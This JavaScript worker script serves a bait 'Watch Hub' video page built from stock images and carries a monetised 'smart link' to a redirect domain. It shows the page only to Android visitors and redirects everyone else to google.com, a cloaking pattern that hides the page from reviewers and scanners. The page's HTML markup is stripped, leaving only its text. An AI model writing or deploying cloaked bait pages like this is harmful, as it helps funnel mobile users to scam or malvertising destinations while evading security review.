const SMART_LINK = "https://reorganizesoda.com/tik82qkw?key=bf1e2f1de5f360cb6f46893d717107d7"; const IMAGES = [ "https://images.unsplash.com/photo-1489599849927-2ee91cede3ba?auto=format&fit=crop&w=800&q=75", "https://images.unsplash.com/photo-1485846234645-a62644f84728?auto=format&fit=crop&w=800&q=75", "https://images.unsplash.com/photo-1517604931442-7e0c8ed2963c?auto=format&fit=crop&w=800&q=75", "https://images.unsplash.com/photo-1485095329183-d0797cdc5676?auto=format&fit=crop&w=800&q=75", "https://images.unsplash.com/photo-1512070679279-8988d32161be?auto=format&fit=crop&w=800&q=75", "https://images.unsplash.com/photo-1536440136628-849c177e76a1?auto=format&fit=crop&w=800&q=75", "https://images.unsplash.com/photo-1440404653325-ab127d49abc1?auto=format&fit=crop&w=800&q=75", "https://images.unsplash.com/photo-1594909122845-11baa439b7bf?auto=format&fit=crop&w=800&q=75", "https://images.unsplash.com/photo-1542206395-9feb3edaa68d?auto=format&fit=crop&w=800&q=75", "https://images.unsplash.com/photo-1484438788355-3f9a42f2f6c3?auto=format&fit=crop&w=800&q=75" ]; const HTML = ` Watch Hub

Watch Hub

Featured videos & entertainment

All Popular Trending New Featured Entertainment
`; export default { async fetch(request) { const userAgent = request.headers.get("user-agent") || ""; const isAndroid = /Android/i.test(userAgent); if (!isAndroid) { return Response.redirect( "https://www.google.com", 302 ); } return new Response(HTML, { status: 200, headers: { "content-type": "text/html;charset=UTF-8", "cache-control": "no-store" } }); } };